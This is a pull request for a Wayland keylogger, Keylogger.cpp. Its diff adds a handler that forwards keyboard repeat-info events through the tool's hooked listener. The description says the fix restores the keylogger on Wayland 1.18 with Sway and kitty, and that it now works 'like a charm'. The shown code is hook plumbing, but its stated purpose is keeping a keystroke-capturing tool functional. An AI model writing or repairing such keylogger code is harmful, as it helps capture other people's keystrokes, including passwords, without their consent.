### PR TITLE
Updated for Wayland 1.18 (added MyHandleKeyboardRepeatInfo)

### DIFF
--- a/Keylogger.cpp
+++ b/Keylogger.cpp
@@ -109,6 +109,10 @@ void MyHandleKeyboardModifiers(void* data, wl_keyboard* keyboard, uint32_t seria
 	KeyLoggerData *d = (KeyLoggerData*) data;
 	((wl_keyboard_listener*) d->implementation)->modifiers(d->data, keyboard, serial, mods_depressed, mods_latched, mods_locked, group);
 }
+void MyHandleKeyboardRepeatInfo(void* data, wl_keyboard* keyboard, int32_t rate, int32_t delay) {
+	KeyLoggerData *d = (KeyLoggerData*) data;
+	((wl_keyboard_listener*) d->implementation)->repeat_info(d->data, keyboard, rate, delay);
+}
 
 wl_keyboard_listener my_keyboard_listener = {
 	MyHandleKeyboardKeymap,
@@ -116,6 +120,7 @@ wl_keyboard_listener my_keyboard_listener = {
 	MyHandleKeyboardLeave,
 	MyHandleKeyboardKey,
 	MyHandleKeyboardModifiers,
+	MyHandleKeyboardRepeatInfo,
 };
 
 struct wl_proxy* g_keyboard_to_log = NULL;


### PR DESCRIPTION
Hey,

Some folks at linux.org.ru complained that it doesn't work so i fixed it. I tested it on Wayland 1.18 with Sway 1.4 and kitty.

Error was:

```
listener function for opcode 5 of wl_keyboard is NULL
```

By the way, readme is absolutely correct, no any real knowledge of Wayland protocol is required. It took about 10 minutes of googling for this keylogger to work like a charm.